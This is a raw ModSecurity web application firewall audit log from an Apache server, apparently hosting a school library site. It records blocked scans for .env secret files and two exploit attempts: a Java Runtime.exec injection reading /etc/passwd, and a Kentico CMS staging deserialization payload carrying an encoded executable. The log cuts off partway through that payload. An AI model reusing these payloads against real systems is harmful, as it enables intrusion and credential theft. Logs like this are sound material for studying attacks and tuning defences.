Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d048037-Z-- --39a84021-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNQAAANY 103.236.140.4 41346 103.236.140.4 8181 --39a84021-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --39a84021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a84021-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557867 1477 (- - -) Stopwatch2: 1747800197557867 1477; combined=369, p1=334, p2=0, p3=0, p4=0, p5=35, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a84021-Z-- --5987e731-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypAAAAAQ 103.236.140.4 41328 103.236.140.4 8181 --5987e731-B-- GET /.env.www HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --5987e731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5987e731-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558014 1467 (- - -) Stopwatch2: 1747800197558014 1467; combined=308, p1=273, p2=0, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5987e731-Z-- --e834615f-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNwAAAME 103.236.140.4 41354 103.236.140.4 8181 --e834615f-B-- GET /.env.140 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --e834615f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e834615f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558290 1310 (- - -) Stopwatch2: 1747800197558290 1310; combined=282, p1=252, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e834615f-Z-- --8e69c43c-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypgAAAAc 103.236.140.4 41362 103.236.140.4 8181 --8e69c43c-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --8e69c43c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e69c43c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558442 1317 (- - -) Stopwatch2: 1747800197558442 1317; combined=386, p1=349, p2=0, p3=0, p4=0, p5=37, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e69c43c-Z-- --728a3d43-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHNgAAANc 103.236.140.4 41338 103.236.140.4 8181 --728a3d43-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --728a3d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --728a3d43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558044 1855 (- - -) Stopwatch2: 1747800197558044 1855; combined=396, p1=353, p2=0, p3=0, p4=0, p5=42, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --728a3d43-Z-- --c9bd1a45-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqAAAAAU 103.236.140.4 41356 103.236.140.4 8181 --c9bd1a45-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --c9bd1a45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9bd1a45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558285 1769 (- - -) Stopwatch2: 1747800197558285 1769; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9bd1a45-Z-- --c180e941-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHOQAAAMM 103.236.140.4 41350 103.236.140.4 8181 --c180e941-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --c180e941-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c180e941-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558181 2003 (- - -) Stopwatch2: 1747800197558181 2003; combined=306, p1=274, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c180e941-Z-- --2d20e45e-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glypwAAAAI 103.236.140.4 41360 103.236.140.4 8181 --2d20e45e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --2d20e45e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d20e45e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558355 1962 (- - -) Stopwatch2: 1747800197558355 1962; combined=342, p1=301, p2=0, p3=0, p4=0, p5=41, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d20e45e-Z-- --174f9f1e-A-- [21/May/2025:11:03:17 +0700] aC1QhRpv_mIXt2pDBOoHOAAAANg 103.236.140.4 41344 103.236.140.4 8181 --174f9f1e-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --174f9f1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --174f9f1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558109 2348 (- - -) Stopwatch2: 1747800197558109 2348; combined=423, p1=391, p2=0, p3=0, p4=0, p5=32, sr=177, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --174f9f1e-Z-- --4567b916-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqQAAAAE 103.236.140.4 41326 103.236.140.4 8181 --4567b916-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --4567b916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4567b916-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197557834 2802 (- - -) Stopwatch2: 1747800197557834 2802; combined=371, p1=313, p2=0, p3=0, p4=0, p5=58, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4567b916-Z-- --93745112-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqgAAAAM 103.236.140.4 41352 103.236.140.4 8181 --93745112-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --93745112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93745112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558211 2602 (- - -) Stopwatch2: 1747800197558211 2602; combined=331, p1=293, p2=0, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93745112-Z-- --bf8a5317-A-- [21/May/2025:11:03:17 +0700] aC1QhXZGSt58M5vv3glyqwAAAAY 103.236.140.4 41358 103.236.140.4 8181 --bf8a5317-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --bf8a5317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf8a5317-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747800197558332 2660 (- - -) Stopwatch2: 1747800197558332 2660; combined=365, p1=322, p2=0, p3=0, p4=0, p5=43, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf8a5317-Z-- --1a3e3e3e-A-- [21/May/2025:11:19:20 +0700] aC1USBpv_mIXt2pDBOoHPgAAAMg 103.236.140.4 41436 103.236.140.4 8181 --1a3e3e3e-B-- POST /account HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 100 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788454 --1a3e3e3e-C-- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=sfuxn --1a3e3e3e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a3e3e3e-E-- --1a3e3e3e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /account"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801160260746 2283 (- - -) Stopwatch2: 1747801160260746 2283; combined=580, p1=378, p2=160, p3=0, p4=0, p5=42, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a3e3e3e-Z-- --982b9140-A-- [21/May/2025:11:19:20 +0700] aC1USHZGSt58M5vv3glytwAAAAI 103.236.140.4 41456 103.236.140.4 8181 --982b9140-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474781 --982b9140-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADA
AYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF